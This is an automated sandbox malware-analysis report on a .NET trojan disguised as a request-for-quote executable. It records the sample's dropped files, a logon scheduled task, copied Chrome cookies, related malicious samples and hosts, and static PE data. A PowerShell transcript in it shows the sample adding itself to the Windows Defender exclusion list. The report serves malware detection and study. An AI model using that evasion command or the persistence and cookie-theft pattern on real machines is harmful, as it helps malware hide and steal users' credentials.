                              Number of analysed new started processes analysed:26
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@9/9@2/1
                              EGA Information:Failed
                              HDC Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240s for sample files taking high CPU consumption
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                              • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.50.102.62, 173.222.108.226, 173.222.108.210, 20.199.120.151, 80.67.82.235, 80.67.82.211, 20.199.120.182, 20.54.110.249, 40.112.88.60, 20.199.120.85, 20.82.210.154
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              10:29:43API Interceptor1619x Sleep call for process: RFQ_99705546,99805546_Mark Cansick.exe modified
                              10:29:47API Interceptor29x Sleep call for process: powershell.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              208.91.198.143Inquiry - Specifications 002021.exeGet hashmaliciousBrowse
                                #RFQ Medimpex International LLC.exeGet hashmaliciousBrowse
                                  New Order.docGet hashmaliciousBrowse
                                    LFC _ X#U00e1c nh#U1eadn #U0111#U01a1n h#U00e0ng _ Kh#U1ea9n c#U1ea5p,pdf.exeGet hashmaliciousBrowse
                                      Curriculum Vitae Milani.exeGet hashmaliciousBrowse
                                        Solicitud de cotizacion.exeGet hashmaliciousBrowse
                                          KLC45E_92421_PI.exeGet hashmaliciousBrowse
                                            Products prices request.xlsxGet hashmaliciousBrowse
                                              Payment Advice 09-22-2021 SKMBT03783930484080484904003TXT.exeGet hashmaliciousBrowse
                                                from-iso_PSC ___ - E41140,PDF.EXEGet hashmaliciousBrowse
                                                  n267kM6LhuZHjzz.exeGet hashmaliciousBrowse
                                                    Cv4ms60aUz.exeGet hashmaliciousBrowse
                                                      iw2crzErP4mvr7r.exeGet hashmaliciousBrowse
                                                        COMTAC LISTA URGENTE ORDEN 92121,pdf.exeGet hashmaliciousBrowse
                                                          PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                            k4QKSYxd03.exeGet hashmaliciousBrowse
                                                              Po#6672.pdf.exeGet hashmaliciousBrowse
                                                                Order Confirmation _ Urgent,pdf.exeGet hashmaliciousBrowse
                                                                  Orde Baru #86-55113 ,pdf.exeGet hashmaliciousBrowse
                                                                    RFQ_AP65425652_032421 segera.exeGet hashmaliciousBrowse

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      us2.smtp.mailhostbox.comDcM2rparqC5rBq3.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      #RFQ Medimpex International LLC.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      INVOICE & TELEX BL_PDF.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      Inquiry - Specifications 002021.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      #RFQ Medimpex International LLC.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      New Order.docGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      LFC _ X#U00e1c nh#U1eadn #U0111#U01a1n h#U00e0ng _ Kh#U1ea9n c#U1ea5p,pdf.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      #U0916#U0930#U0940#U0926 #U0906#U0926#U0947#U0936-34002174,pdf.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      #Uc7ac #Uc8fc#Ubb38 #Ud655#Uc778,pdf.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      4f7K9bfgNr.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      Curriculum Vitae Milani.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      Solicitud de cotizacion.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      New Order.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      KLC45E_92421_PI.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      PO-3242.xlsxGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      MONO Nueva orden - E41140,PDF.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      SO230921.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      Products prices request.xlsxGet hashmaliciousBrowse
                                                                      • 208.91.198.143
                                                                      3qyhcUC9um.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      PUBLIC-DOMAIN-REGISTRYUSATKtxrOZ8V.dllGet hashmaliciousBrowse
                                                                      • 204.11.58.87
                                                                      waffle_lol.xlsGet hashmaliciousBrowse
                                                                      • 204.11.59.34
                                                                      waffle_lol.xlsGet hashmaliciousBrowse
                                                                      • 204.11.59.34
                                                                      p2SijKiqgZ.dllGet hashmaliciousBrowse
                                                                      • 162.215.253.14
                                                                      DcM2rparqC5rBq3.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      #RFQ Medimpex International LLC.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      ejecutable1.exeGet hashmaliciousBrowse
                                                                      • 162.251.85.174
                                                                      recital-239880844.xlsGet hashmaliciousBrowse
                                                                      • 204.11.59.34
                                                                      INVOICE & TELEX BL_PDF.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      recital-239880844.xlsGet hashmaliciousBrowse
                                                                      • 204.11.59.34
                                                                      Inquiry - Specifications 002021.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      waff.xlsGet hashmaliciousBrowse
                                                                      • 204.11.59.34
                                                                      #RFQ Medimpex International LLC.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.223
                                                                      SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      New Order.docGet hashmaliciousBrowse
                                                                      • 208.91.199.225
                                                                      LFC _ X#U00e1c nh#U1eadn #U0111#U01a1n h#U00e0ng _ Kh#U1ea9n c#U1ea5p,pdf.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      #U0916#U0930#U0940#U0926 #U0906#U0926#U0947#U0936-34002174,pdf.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      #Uc7ac #Uc8fc#Ubb38 #Ud655#Uc778,pdf.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      4f7K9bfgNr.exeGet hashmaliciousBrowse
                                                                      • 208.91.199.224
                                                                      Curriculum Vitae Milani.exeGet hashmaliciousBrowse
                                                                      • 208.91.198.143

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RFQ_99705546,99805546_Mark Cansick.exe.log
                                                                      Process:C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:modified
                                                                      Size (bytes):1308
                                                                      Entropy (8bit):5.345811588615766
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                                      MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                                      SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                                      SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                                      SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                                      Malicious:true
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):20532
                                                                      Entropy (8bit):5.576271550540985
                                                                      Encrypted:false
                                                                      SSDEEP:384:xtADmq0GepxJGyt06b2LmYSBKnqulf17V9wiiSJ3xyT1M1NZlXz9CldQ:zpGM5bW4KqulfifcwCXfj/
                                                                      MD5:964D140ECBCF4D238E60FBEB7C34A2FD
                                                                      SHA1:50EB86756D6AA588A90A4606CE3E663F009AEF46
                                                                      SHA-256:8C133632EC199CD39905FE00367ADCBD4B6E18F80B71D190A0DA00AAE67075C8
                                                                      SHA-512:9DF036170EBC4C2E8EFF6F930291AF2E8C79ADEDE3D122DABBC1FB872A4B4FF4E74DF746A9FA1EA721B89C33DAB91242752E185C266FC4D8292FDC055E7E2C4C
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview: @...e...................h...v.c.`.........I..........@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)_.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcf5x51b.wqi.ps1
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview: 1
                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzii5gj3.las.psm1
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:very short file (no magic)
                                                                      Category:dropped
                                                                      Size (bytes):1
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:U:U
                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                      Malicious:false
                                                                      Preview: 1
                                                                      C:\Users\user\AppData\Local\Temp\tmp1646.tmp
                                                                      Process:C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1644
                                                                      Entropy (8bit):5.188951996793555
                                                                      Encrypted:false
                                                                      SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBmtn:cbh47TlNQ//rydbz9I3YODOLNdq32
                                                                      MD5:A6FF3913B931EFE6AEA8EC3B2457CBBD
                                                                      SHA1:829DE04AE7570B4F80FAECE3DA4637086C52D617
                                                                      SHA-256:BBD9A0F78239C9D7F928FE0512D193E9C0418E25E9DEB77279D2F15066418ACC
                                                                      SHA-512:56A316CF38B4B9AB157A5C833C43C965B1D9E0DE970B3EE9DA03DA8D52F40CA4D888953E01AA4E9CF5DEAA7E2A5A792AEA533FA10B1CAF53DF373BB74D3A8CF9
                                                                      Malicious:true
                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                                      C:\Users\user\AppData\Roaming\oxafn20f.vrf\Chrome\Default\Cookies
                                                                      Process:C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                      Category:dropped
                                                                      Size (bytes):20480
                                                                      Entropy (8bit):0.6970840431455908
                                                                      Encrypted:false
                                                                      SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                      MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                      SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                      SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                      SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                      Malicious:false
                                                                      Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      C:\Users\user\AppData\Roaming\sucEaYWuNda.exe
                                                                      Process:C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):581120
                                                                      Entropy (8bit):7.264972453257549
                                                                      Encrypted:false
                                                                      SSDEEP:12288:hXBNi+hBr7IUAvJZrd4r9gGrWLYaZ4daRiWLOYe0AUtXPcI7E:dBNi+hBr8UAvJ8r9gGy3kaRiWCH0Aqcl
                                                                      MD5:724BCE9BE00D521C9AE6075D50434B11
                                                                      SHA1:A95A26499D30F48CA0B23E17B7273B1E6B92F8AC
                                                                      SHA-256:94BC5B095176CCF49917563287006F3EFD903CAC47D48E251F4F4554EE87C990
                                                                      SHA-512:D4082A9ECA3F687EEF2A1873368D89AFCDF88461C24C6E0378E7925000562800A02DD6194FA81FB0B1150114A5451CBA6B168739AE2D389EFE0B82613B4D50BA
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../.Ra..............0.............V.... ........@.. .......................@............@.....................................O............................ ....................................................... ............... ..H............text...\.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................8.......H........@..h...........l................................................0...........r...p.+..*..0...........r_..p.+..*..0..................+..*".(.....*^..}.....(.......(.....*....0.............+.s....(.......X.......-.*....0..+.........,..{.......+....,...{....o........(.....*..0..1.........s....}.....(......{.... .....3s....o .....{....r...po!.....{.....K..s"...o#.....{.....o$.....{....r...po%.....{.....o&....."...@"..PAs'...((......()..... J... ....s"...(*....~....r...p(.
                                                                      C:\Users\user\AppData\Roaming\sucEaYWuNda.exe:Zone.Identifier
                                                                      Process:C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:true
                                                                      Preview: [ZoneTransfer]....ZoneId=0
                                                                      C:\Users\user\Documents\20210928\PowerShell_transcript.226533.4aAYYda1.20210928102945.txt
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):3573
                                                                      Entropy (8bit):5.38994284121076
                                                                      Encrypted:false
                                                                      SSDEEP:96:BZih/NHqDo1ZU7rZkh/NHqDo1ZFqZI0cI0cI0LZw:2ccR
                                                                      MD5:7AFAE7FAE22F13C5C0CBD585D7F25DED
                                                                      SHA1:E1AE53D4990F90121147B63D10BFB142E3FBB5FB
                                                                      SHA-256:5582BC6B08B433F8902B558351491C08A79371C6470CFEF2F019B31C13A26E89
                                                                      SHA-512:398F3F0E8F12DCC3F24F4F86D96228D370ED645526E2C117638AA8B5B01E2C0E9C5BA803A5298183612D8173440352198511CE4CBA75AFB3439921656224CAF8
                                                                      Malicious:false
                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210928102946..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 226533 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe..Process ID: 4200..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210928102946..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe..**********************..Command start time: 20210928103246..**********************..PS>TerminatingError(Add-MpPreference):

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.264972453257549
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:RFQ_99705546,99805546_Mark Cansick.exe
                                                                      File size:581120
                                                                      MD5:724bce9be00d521c9ae6075d50434b11
                                                                      SHA1:a95a26499d30f48ca0b23e17b7273b1e6b92f8ac
                                                                      SHA256:94bc5b095176ccf49917563287006f3efd903cac47d48e251f4f4554ee87c990
                                                                      SHA512:d4082a9eca3f687eef2a1873368d89afcdf88461c24c6e0378e7925000562800a02dd6194fa81fb0b1150114a5451cba6b168739ae2d389efe0b82613b4d50ba
                                                                      SSDEEP:12288:hXBNi+hBr7IUAvJZrd4r9gGrWLYaZ4daRiWLOYe0AUtXPcI7E:dBNi+hBr8UAvJ8r9gGy3kaRiWCH0Aqcl
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../.Ra..............0.............V.... ........@.. .......................@............@................................

                                                                      File Icon

                                                                      Icon Hash:00828e8e8686b000

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x48f056
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                      Time Stamp:0x6152C02F [Tue Sep 28 07:11:43 2021 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:v4.0.30319
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x8f0040x4f.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x900000x608.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x920000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000x8d05c0x8d200False0.785502242028data7.27876298781IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
